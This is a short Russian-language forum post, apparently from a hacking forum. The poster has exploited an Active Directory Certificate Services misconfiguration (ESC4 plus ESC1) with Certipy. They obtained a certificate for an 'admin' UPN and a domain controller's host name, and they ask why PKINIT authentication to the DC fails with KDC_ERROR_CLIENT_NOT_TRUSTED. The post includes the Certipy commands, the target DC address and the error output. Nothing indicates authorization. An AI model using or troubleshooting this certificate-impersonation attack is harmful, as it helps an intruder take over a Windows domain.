Есть доступ где ADCS уязвим к ESC4 + ESC1 , request проходит успешно, получаем вывод
Дальше при попытке авторизоваться с pfx файлом - на auth -pfx выкидывает ошибку , время синхронизировано , подскажите куда еще смотреть в чем может быть проблема? Содержание команды и ошибки:
пробовал на разные дк, так же пробовал вместо UPN авторизацию по DNS но везде одинаковая ошибка - KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT
Код:
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 7735
[*] Got certificate with multiple identifications
UPN: 'admin@domain.com'
DNS Host Name: 'domaindc02.domain.com'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'admin_domaindc02.pfx'
Дальше при попытке авторизоваться с pfx файлом - на auth -pfx выкидывает ошибку , время синхронизировано , подскажите куда еще смотреть в чем может быть проблема? Содержание команды и ошибки:
Код:
certipy64.exe auth -pfx admin_domaindc02.pfx -dc-ip 172.16.206.74
Certipy v4.0.0 - by Oliver Lyak (ly4k)
Exception in thread Thread-1:
Traceback (most recent call last):
File "threading.py", line 1016, in _bootstrap_inner
File "dns\win32util.py", line 48, in run
File "dns\win32util.py", line 26, in _config_domain
AttributeError: 'NoneType' object has no attribute 'startswith'
[*] Found multiple identifications in certificate
[*] Please select one:
[0] UPN: 'admin@domain.com'
[1] DNS Host Name: 'domaindc02@domain.com'
> 0
[*] Using principal: domaindc02@domain.com
[*] Trying to get TGT...
[-] Got error while trying to request TGT: Kerberos SessionError: KDC_ERROR_CLIENT_NOT_TRUSTED(Reserved for PKINIT)